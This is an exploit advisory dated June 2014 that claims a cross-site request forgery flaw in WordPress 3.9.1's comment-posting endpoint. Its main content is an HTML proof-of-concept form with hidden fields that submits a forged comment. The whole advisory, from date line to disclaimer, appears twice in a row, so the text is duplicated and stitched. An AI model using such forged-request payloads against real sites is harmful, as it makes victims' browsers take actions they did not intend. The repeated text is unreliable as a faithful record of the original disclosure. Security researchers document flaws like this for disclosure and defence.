# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
# DATE:21st June,2014
# Author:Avinash Kumar Thapa
#URL: localhost/wordpress/
#PATCH/FIX:Not fixed yet.
###################################################################################################
Technical Details:
This is the new version released by Wordpress.
version is 3.9.1(Latest)
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
#####################################################################################################
Exploit Code:
<html>
<!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
<body>
<form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
<input type="hidden" name="author" value="Anonymous" />
<input type="hidden" name="email" value="helloworld@outlook.com" />
<input type="hidden" name="url" value="www.random.com" />
<input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
<input type="hidden" name="submit" value="Post Comment" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="comment_parent" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
###########################################################################################################
----
-- Avinash
a.k.a
**SPID3R**
twitter: @m_avinash143<https://twitter.com/m_avinash143>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# DATE:21st June,2014
# Author:Avinash Kumar Thapa
#URL: localhost/wordpress/
#PATCH/FIX:Not fixed yet.
###################################################################################################
Technical Details:
This is the new version released by Wordpress.
version is 3.9.1(Latest)
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
#####################################################################################################
Exploit Code:
<html>
<!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
<body>
<form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
<input type="hidden" name="author" value="Anonymous" />
<input type="hidden" name="email" value="helloworld@outlook.com" />
<input type="hidden" name="url" value="www.random.com" />
<input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
<input type="hidden" name="submit" value="Post Comment" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="comment_parent" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
###########################################################################################################
----
-- Avinash
a.k.a
**SPID3R**
twitter: @m_avinash143<https://twitter.com/m_avinash143>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information